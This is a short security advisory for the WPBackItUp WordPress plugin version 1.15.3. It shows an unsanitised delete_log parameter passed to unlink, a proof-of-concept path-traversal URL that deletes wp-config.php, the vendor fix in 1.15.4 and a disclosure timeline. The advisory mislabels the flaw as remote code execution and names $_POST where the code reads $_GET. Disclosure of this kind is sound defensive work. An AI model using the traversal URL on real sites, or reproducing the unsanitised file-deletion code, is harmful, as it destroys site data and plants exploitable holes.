Details
- Name : WPBackItUp Backup
- Version : 1.15.3
- Homepage : https://wordpress.org/plugins/wp-backitup/
Type
- Remote Code Execution - RCE
- Vulnerabilities discovered
Description
- Type user access: administrator user.
- $_POST[‘delete_log’] is not escaped.
Code
File: wp-content/plugins/wp-backitup/views/support.php
Line: 335 - 343
private function delete_action() {
$filename = WPBACKITUP__LOGS_PATH . '/' . $_GET['delete_log'];
if ( file_exists( $filename ) ) {
unlink( $filename );
}
}
Proof Concept
- Log in with administrator user.
- Access url:
- http://target/wp-admin/admin.php?page=wp-backitup-support&delete_log=..%2F..%2F..%2F..%2Fwp-config.php
Results
wp-config deleted and restart system.
Note
Solution
1.15.4
*Release Date – January 3, 2018
- FIX : Fix security issue with delete log
- UPDATE: Admin notice updates
- UPDATE: Enhancements to support WPBackItUp Safe cloud storage
Timeline
- Date Discovery : 11/28/2017
- Date Vendor Contact : 12/26/2017
- Date Publish : 01/04/2018
- Date Resolution : 01/03/2018